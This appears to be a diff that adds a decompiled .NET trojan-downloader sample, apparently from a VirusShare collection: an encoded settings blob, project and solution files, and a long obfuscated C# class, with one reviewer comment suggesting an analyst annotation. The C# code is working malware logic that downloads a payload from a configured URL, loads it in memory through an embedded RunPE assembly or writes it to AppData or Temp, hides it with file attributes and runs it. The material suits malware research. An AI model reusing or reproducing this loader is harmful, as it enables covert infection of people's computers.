½¾ùìí¡÷äóòèîï¼£°¯±£¾¿Œ‹½ÑóîõäâõèîïÒõôã×àíôäò¿Œ‹¡¡½Åäíèìèõäóò¿Œ‹¡¡¡¡½ÒõôãÅäíèì¿åçöêê÷ðë±ïñµõó°´ùõëæðõ²ëó½®ÒõôãÅäíè쿌‹¡¡¡¡½ÌäòòàæäÅäíèì¿ñõêûñôôå³²âçà÷õäâ±æû÷óí´ä½®ÌäòòàæäÅäíè쿌‹¡¡¡¡½ÀíæîÅäíèì¿Ôàûêøñðïâæí÷ó´ûòò½®ÀíæîÅäíè쿌‹¡¡¡¡½ìèòâäííàïäîôòÅäíèì¿çè÷æî±òãê÷ê´îææãøãöøëêäæä½®ìèòâäííàïäîôòÅäíè쿌‹¡¡¡¡½öäãÆäõÅäíèì¿åìñãé÷±âîðæãâðã÷í½®öäãÆäõÅäíè쿌‹¡¡¡¡½ÃîôïåÇèíäÅäíèì¿ûçêîååðóå±÷òéâèîåçåê°ðàøö½®ÃîôïåÇèíäÅäíè쿌‹¡¡¡¡½ÏäöÃîôïåÇèíäÅäíèì¿æðëèä´æ±ôí÷öçéò°õµ÷ëøùõ²ê½®ÏäöÃîôïåÇèíäÅäíè쿌‹¡¡½®Åäíèìèõäóò¿Œ‹¡¡½Óäòîôóâäò¿Œ‹¡¡¡¡½ÓäòîôóâäÕøñ俌‹¡¡¡¡¡¡½ÒäõõèïæòÕøñä¿ÐÕ±ÏÉÔÉÐÑÍ˰ÄÅÔÔÖÅÒØ³ÉÎÈËÔÈÖÇÕ°Ô³½®ÒäõõèïæòÕøñ俌‹¡¡¡¡¡¡½ÅàõàÕøñä¿ËÃÒÐ̵µ×ÎÑÖËÛÊÅÐѽ®ÅàõàÕøñ俌‹¡¡¡¡¡¡½ÃèïåäóÕøñä¿ÐÏÐÆË²Ë´ÃÇÖÑÃÛʳÂÌÃ×ÖÀÍÅϽ®ÃèïåäóÕøñ俌‹¡¡¡¡½®ÓäòîôóâäÕøñ俌‹¡¡¡¡½ÓäòîôóâäÈÅ¿Œ‹¡¡¡¡¡¡½ÒäõõèïæòÈÅ¿´´½®ÒäõõèïæòÈÅ¿Œ‹¡¡¡¡¡¡½ÅàõàÈÅ¿²¹½®ÅàõàÈÅ¿Œ‹¡¡¡¡¡¡½ÃèïåäóÈÅ¿¸´½®ÃèïåäóÈÅ¿Œ‹¡¡¡¡½®ÓäòîôóâäÈÅ¿Œ‹¡¡½®Óäòîôóâäò¿Œ‹¡¡½Óäìî÷äÂîå俌‹¡¡¡¡½ÌäòòàæäÃîù¿Õóôä½®ÌäòòàæäÃîù¿Œ‹¡¡¡¡½Òõàóõôñ¿Õóôä½®Òõàóõôñ¿Œ‹¡¡¡¡½Ãèïåäó¿Õóôä½®Ãèïåä󿌋¡¡¡¡½Âîìñóäòòèîï¿Õóôä½®Âîìñóäòòèîᅩ‹¡¡¡¡½ÖäãÆäõ¿Õóôä½®ÖäãÆäõ¿Œ‹¡¡½®Óäìî÷äÂîå俌‹¡¡½ÕóàïòçäóÕøñ俌‹¡¡¡¡½Óäòîôóâä¿Õóôä½®Óäòîôóâ俌‹¡¡½®ÕóàïòçäóÕøñ俌‹¡¡½ÓôïÑÄÌèòòèïæ¿Œ‹¡¡¡¡½ÌèòòèïæÑÄ¿Çàíòä½®ÌèòòèïæÑÄ¿Œ‹¡¡¡¡½ÒõôãÄïâóøñõèîᅩ‹¡¡¡¡¡¡½äïâóøñõèîïÔòäå¿ÙÎÓ½®äïâóøñõèîïÔòä忌‹¡¡¡¡¡¡½àííÄïâóøñõèîïò¿Çàíòä½®àííÄïâóøñõèîïò¿Œ‹¡¡¡¡½®ÒõôãÄïâóøñõèîᅩ‹¡¡½®ÓôïÑÄÌèòòèïæ¿Œ‹½®ÑóîõäâõèîïÒõôã×àíôäò¿
@@ -0,0 +1,47 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>hh2ifwz3</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="wisp1ff1rpzacn3jgfnasrkhmiolo44qt.cs" />
<Compile Include="panz0mon2f5aateyhtphwozah.cs" />
<Compile Include="Rjk3ibeceopw5x00uimwa5h2w\ch2futx3h3zpmhyzsblwlfrdktcnf3voh.cs" />
<Compile Include="Vza1nv3mnlezcxvyx\ekrod4bellvfxnmof.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="runPE.dll" />
<EmbeddedResource Include="Settings.xml" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
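Review bot: The `<EmbeddedResource Include="runPE.dll" />` item carries no annotation, although it is a second binary embedded inside the sample and needs its own handling during analysis. In `ekrod4bellvfxnmof.cs` later in this commit, an `Assembly.Load` call takes its argument from a helper applied to the decoded string `"lld.EPnur"` (the resource name reversed), which suggests the resource is loaded in memory rather than written to disk; the helper bodies are not visible here, so that remains an inference. `Settings.xml` presumably corresponds to the encoded one-line blob added just before this project file. I would add `<!-- Analyst note: runPE.dll is an embedded second-stage assembly; extract and hash it separately from the parent sample. Settings.xml is stored encoded. -->` above the `ItemGroup`.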
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hh2ifwz3", "Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.csproj", "{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8D9A5182-21E8-42D6-A744-9FF91B87AA1E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,524 @@
// Decompiled with JetBrains decompiler
// Type: Vza1nv3mnlezcxvyx.ekrod4bellvfxnmof
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using Microsoft.Win32;
using Rjk3ibeceopw5x00uimwa5h2w;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace Vza1nv3mnlezcxvyx
{
public class ekrod4bellvfxnmof
{
private static bool Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
private byte[] Tts2baf3wiatv5ghnswu3fu4o;
private bool sdztd0ena42ywf4cfnspntfxhjgjjuo2x;
private string vazu5g3yn2qoupbzrnflcm5ta;
private string jfq5w2hqrukvsivotb2eaetcj;
private string H43ao0q1ckx2y3w0qhozixdn5 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private int C2zbxxi4za2fdbthchmjymbz0;
private int Zusxmm13kjq0lro02;
private int Byijlyljtwhknkf5jkcwcjhnmxbyfow1f;
private string Mi5ejdb45agibefgw = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ROX");
private string Vwrshilkfvt1muxtiaxqao2vn = string.Empty;
private string Va4nkquvaa0egawrugbp4frralrih1cl5 = string.Empty;
private int vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb;
private string act0dsy5xkcjtyk4udzmsxpor = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string mehj1nkb5kab31y4pa5zzd3zh = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string Z2sx3vgolcrkx42a5b2bhnmdt = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string wvlwdt5q3igbdkbluauqgzxazzitgesk2 = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0");
private string ljjgffrum0vanmiev3ujguzbfjpaluf1a = string.Empty;
private string Ns5tkmgwpxzdzhfzygk50izkv = string.Empty;
private string Dxpmu5z21l0jogt41vcdm0t2p = string.Empty;
private string hdb50yp4mb51cxajtk2qahcip = string.Empty;
private string Qmztipvjjobds0bdpgipbz14g = string.Empty;
private string mqmfhbfuww2freoox = string.Empty;
private string Kkrle03d2ekkcyuc2c2102hjd = string.Empty;
private string hyrbz1kfxjvaxj0vistcunjymen3kporm = string.Empty;
private string Ajiami1b52zvc3vohgymtmh5a = string.Empty;
private string R3u01lftwibuhcd22 = string.Empty;
private string Zjtchyef12cwxg4onylzlprmn = string.Empty;
private bool cxhxnrorc5mp1ujxhtq1kbke4;
private bool Fkgl04y45wljpapzd;
private string U5rbzma1hlby3eyyhjbmc5kyd = string.Empty;
private string Odlyq3qfbpoq3mg0so5fipxwu = string.Empty;
private bool cwygyk0oxmm4oly4f;
private string Obpmsku4cgcztab1lmoobkyt5 = string.Empty;
private string gkgcqdokyjuxym4wq0314usgk = string.Empty;
private string nd5mirnaddlzplmuj2yyvlyhv = string.Empty;
private string Jxy14wwtwogymn1qrjcja2xpw = string.Empty;
private bool Mebghajzp0czroix5exzsbjcb;
private bool rkkwfbuqo0azkksqy;
private bool buvpnbb4jdddrparyku5zhpzb;
private bool cgkruwksz1uyngdvorfai14estiwjwa22;
private object zuc0g2puhfoogprwx4kio2wu1;
private MethodInfo Gdjkuqh0cbgb2rrfkrtpdepl3;
private byte[] h3mz2iy1yrgiwje2h(
byte[] V1vn1s3fuxwiz1zga0ixvfsqwh4o403an,
int nmn3ufkvroquqymwx)
{
GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(V1vn1s3fuxwiz1zga0ixvfsqwh4o403an), CompressionMode.Decompress);
byte[] buffer = new byte[nmn3ufkvroquqymwx];
gzipStream.Read(buffer, 0, buffer.Length);
return buffer;
}
private object Xthp414gtl2l4oueqfpd4vbwz(int nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf)
{
Assembly assembly = Assembly.Load(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(ekrod4bellvfxnmof.S2suq1p5s53jd0tp35scdyryf(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lld.EPnur"))));
Thread.Sleep(1000);
System.Type type = assembly.GetTypes()[nauf3mqkhnk2uh1b0ctkgdwzdgjublhyf];
this.Gdjkuqh0cbgb2rrfkrtpdepl3 = type.GetMethod(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("nuR"));
return Activator.CreateInstance(type);
}
public static byte[] S2suq1p5s53jd0tp35scdyryf(string qocihecx3yidmrejz)
{
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(qocihecx3yidmrejz))
{
byte[] buffer = new byte[1024];
using (MemoryStream memoryStream = new MemoryStream())
{
while (true)
{
int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream.Write(buffer, 0, count);
else
break;
}
return memoryStream.ToArray();
}
}
}
private byte[] pcbc3w2jxlqgmdfs0dlf3dbkc(byte[] Rmzrohqsvjl2eukqp)
{
if (this.Mi5ejdb45agibefgw == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("rox"))
Rmzrohqsvjl2eukqp = wisp1ff1rpzacn3jgfnasrkhmiolo44qt.br40vohypenwwv4th(Rmzrohqsvjl2eukqp);
return Rmzrohqsvjl2eukqp;
}
private void Dsqyxep1xbkqqwuokcmpwlnunygdkudqf()
{
try
{
byte[] numArray = new WebClient().DownloadData(new Uri(this.Obpmsku4cgcztab1lmoobkyt5));
if (this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
{
try
{
if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) numArray,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
null
});
}
}
catch
{
string tempFileName = Path.GetTempFileName();
this.c55ygxxz3rp1vsemw5o013b42(numArray, tempFileName, true);
}
}
if (!(this.gkgcqdokyjuxym4wq0314usgk == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
return;
string str = this.nd5mirnaddlzplmuj2yyvlyhv + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.Jxy14wwtwogymn1qrjcja2xpw;
this.c55ygxxz3rp1vsemw5o013b42(numArray, str, true);
if (this.Mebghajzp0czroix5exzsbjcb)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.rkkwfbuqo0azkksqy)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (!this.buvpnbb4jdddrparyku5zhpzb)
return;
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
catch (Exception ex)
{
}
}
private static void kv5qn4lnozkkzgj3vdlka0jwl(byte[] Aucuhbtavanuedaqa)
{
try
{
Thread thread = new Thread(new ParameterizedThreadStart(ekrod4bellvfxnmof.Ezm5v3x5yymbsublp));
thread.SetApartmentState(ApartmentState.STA);
thread.Start((object) Aucuhbtavanuedaqa);
thread.Join();
}
catch
{
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
}
}
private static void Ezm5v3x5yymbsublp(object cbftjeed2ce2adwwe4mzldgan)
{
try
{
MethodInfo entryPoint = Assembly.Load((byte[]) cbftjeed2ce2adwwe4mzldgan).EntryPoint;
if (entryPoint.GetParameters().Length == 1)
entryPoint.Invoke((object) null, new object[1]
{
(object) new string[0]
});
else
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = false;
}
}
private bool Eapnz3st2tmrdospqmsffns5v(byte[] cjulchhdqxyzkyudifjjo2o31)
{
ekrod4bellvfxnmof.kv5qn4lnozkkzgj3vdlka0jwl(cjulchhdqxyzkyudifjjo2o31);
bool pfc4nm2xfxznssiyioxrgqtphwj0yo4me = ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
ekrod4bellvfxnmof.Pfc4nm2xfxznssiyioxrgqtphwj0yo4me = true;
return pfc4nm2xfxznssiyioxrgqtphwj0yo4me;
}
private void c55ygxxz3rp1vsemw5o013b42(
byte[] hzigskm110h1nfyzxef4f250l,
string Sykxwcxny5q4qajbe,
bool hfm3jqdunhihvesbsfgqdjg4j)
{
try
{
System.IO.File.WriteAllBytes(Sykxwcxny5q4qajbe, hzigskm110h1nfyzxef4f250l);
if (!hfm3jqdunhihvesbsfgqdjg4j)
return;
new Process()
{
StartInfo = {
FileName = Sykxwcxny5q4qajbe
}
}.Start();
}
catch
{
}
}
private byte[] n321udrptnm3xnkdwdxsh0wft(
string Juxxajgoa55m1rpp3wo1ces5w,
int Doydtmooq4wyxmncj,
string q05wpvgwzb3o3sxhl)
{
try
{
IntPtr hModule = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Pnqgzzjk5f0hyikci(string.Empty);
IntPtr hResInfo = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ffz3mpnfyg4clsrkfrhqubycp(hModule, Doydtmooq4wyxmncj, q05wpvgwzb3o3sxhl);
uint length = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.Ncmhhqqsfk5fqfa4eo2qymkyp(hModule, hResInfo);
IntPtr source = ch2futx3h3zpmhyzsblwlfrdktcnf3voh.yeyqpjvohzgayjchvjm2bzdvn(hModule, hResInfo);
byte[] destination = new byte[(IntPtr) length];
Marshal.Copy(source, destination, 0, (int) length);
return destination;
}
catch (Exception ex)
{
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :ecruoser gnidaer rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
return (byte[]) null;
}
}
private string rxto5yfudomwo4quiatvxlgxu(string Mbiqervyw5m4axeh1jzypdawz)
{
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaP noitacilppA"))
Mbiqervyw5m4axeh1jzypdawz = Application.StartupPath + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("pmeT"))
Mbiqervyw5m4axeh1jzypdawz = Path.GetTempPath();
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ataDppA"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("stnemucoD yM"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("potkseD"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("eliforP resU"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ELIFORPRESU")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Mbiqervyw5m4axeh1jzypdawz == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("seliF margorP"))
Mbiqervyw5m4axeh1jzypdawz = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
return Mbiqervyw5m4axeh1jzypdawz;
}
private string Lzzeex3tbjpnswaet3q3lgne0(string Xp3a2j1mbsdadmfpxakut5qur)
{
string str = string.Empty;
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("0"))
str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
str = Path.GetTempPath();
if (Xp3a2j1mbsdadmfpxakut5qur == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2"))
str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\");
return str;
}
private void Myk2onyuqzunnxikmdzm0nc2t(string Rmzrohqsvjl2eukqp)
{
string[] separator1 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("k3txyjv4t1shfwvlu0g5eijqg")
};
string[] separator2 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("wyaq1kdfdoichsv0drqddokfz")
};
string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
string empty1 = string.Empty;
string empty2 = string.Empty;
string empty3 = string.Empty;
for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
{
string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
byte[] numArray = panz0mon2f5aateyhtphwozah.ydxqx4ckpkuemhnp4n2eb4laj(strArray2[1]);
string str1 = strArray2[2];
bool boolean1 = Convert.ToBoolean(strArray2[3]);
string Mbiqervyw5m4axeh1jzypdawz = strArray2[4];
bool boolean2 = Convert.ToBoolean(strArray2[5]);
bool boolean3 = Convert.ToBoolean(strArray2[6]);
int int32 = Convert.ToInt32(strArray2[7]);
bool boolean4 = Convert.ToBoolean(strArray2[8]);
string str2 = this.rxto5yfudomwo4quiatvxlgxu(Mbiqervyw5m4axeh1jzypdawz);
if (boolean1)
{
if (boolean3)
numArray = this.h3mz2iy1yrgiwje2h(numArray, int32);
if (boolean2)
numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
if (!boolean4)
{
try
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) numArray,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
null
});
}
catch (Exception ex)
{
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :yromem otni elif dnuob gnitcejni rorrE") + Environment.NewLine + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :edoc rorrE") + ex.Message);
}
}
else if (!this.Eapnz3st2tmrdospqmsffns5v(numArray))
Console.WriteLine(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(" :noitcelfer gnisu elif dnuob gnitcejni rorrE"));
}
else
{
string Sykxwcxny5q4qajbe = str2 + str1;
if (boolean2)
numArray = this.pcbc3w2jxlqgmdfs0dlf3dbkc(numArray);
this.c55ygxxz3rp1vsemw5o013b42(numArray, Sykxwcxny5q4qajbe, true);
}
}
}
private void i4apa2zau4uyfet5mwpyrsauzpucwiech(string Rmzrohqsvjl2eukqp)
{
string[] separator1 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("e5lrvzg0cetvafc32duupzktp")
};
string[] strArray1 = Rmzrohqsvjl2eukqp.Split(separator1, StringSplitOptions.None);
string[] separator2 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ssz5rvlgcnqpykzaU")
};
string[] strArray2 = Rmzrohqsvjl2eukqp.Split(separator2, StringSplitOptions.None);
string[] separator3 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("egekjywbybggo5kvkbs0ogvif")
};
string[] strArray3 = Rmzrohqsvjl2eukqp.Split(separator3, StringSplitOptions.None);
string[] separator4 = new string[1]
{
wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("lvbqcbgqoc0vhbpmd")
};
string[] strArray4 = Rmzrohqsvjl2eukqp.Split(separator4, StringSplitOptions.None);
this.H43ao0q1ckx2y3w0qhozixdn5 = strArray1[1];
this.vazu5g3yn2qoupbzrnflcm5ta = strArray1[2];
this.jfq5w2hqrukvsivotb2eaetcj = strArray1[3];
this.C2zbxxi4za2fdbthchmjymbz0 = Convert.ToInt32(strArray1[4]);
this.Zusxmm13kjq0lro02 = Convert.ToInt32(strArray1[5]);
this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f = Convert.ToInt32(strArray1[6]);
this.Mi5ejdb45agibefgw = strArray2[1];
this.Vwrshilkfvt1muxtiaxqao2vn = strArray2[2];
this.Va4nkquvaa0egawrugbp4frralrih1cl5 = strArray2[3];
this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb = Convert.ToInt32(strArray3[1]);
this.act0dsy5xkcjtyk4udzmsxpor = strArray3[2];
this.mehj1nkb5kab31y4pa5zzd3zh = strArray3[3];
this.Z2sx3vgolcrkx42a5b2bhnmdt = strArray3[4];
this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 = strArray3[5];
this.ljjgffrum0vanmiev3ujguzbfjpaluf1a = strArray3[6];
this.Ns5tkmgwpxzdzhfzygk50izkv = strArray3[7];
this.Dxpmu5z21l0jogt41vcdm0t2p = strArray3[8];
this.hdb50yp4mb51cxajtk2qahcip = strArray3[9];
this.Qmztipvjjobds0bdpgipbz14g = strArray3[10];
this.mqmfhbfuww2freoox = strArray3[11];
this.Kkrle03d2ekkcyuc2c2102hjd = this.Lzzeex3tbjpnswaet3q3lgne0(strArray3[12]);
this.hyrbz1kfxjvaxj0vistcunjymen3kporm = strArray3[13];
this.Ajiami1b52zvc3vohgymtmh5a = strArray3[14];
this.R3u01lftwibuhcd22 = strArray3[15];
this.cxhxnrorc5mp1ujxhtq1kbke4 = Convert.ToBoolean(strArray3[16]);
this.Fkgl04y45wljpapzd = Convert.ToBoolean(strArray3[17]);
this.U5rbzma1hlby3eyyhjbmc5kyd = this.rxto5yfudomwo4quiatvxlgxu(strArray3[18]) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Path.GetRandomFileName();
this.Zjtchyef12cwxg4onylzlprmn = strArray3[19];
this.Odlyq3qfbpoq3mg0so5fipxwu = strArray3[20];
this.U5rbzma1hlby3eyyhjbmc5kyd = this.U5rbzma1hlby3eyyhjbmc5kyd.Substring(0, this.U5rbzma1hlby3eyyhjbmc5kyd.Length - 4) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.");
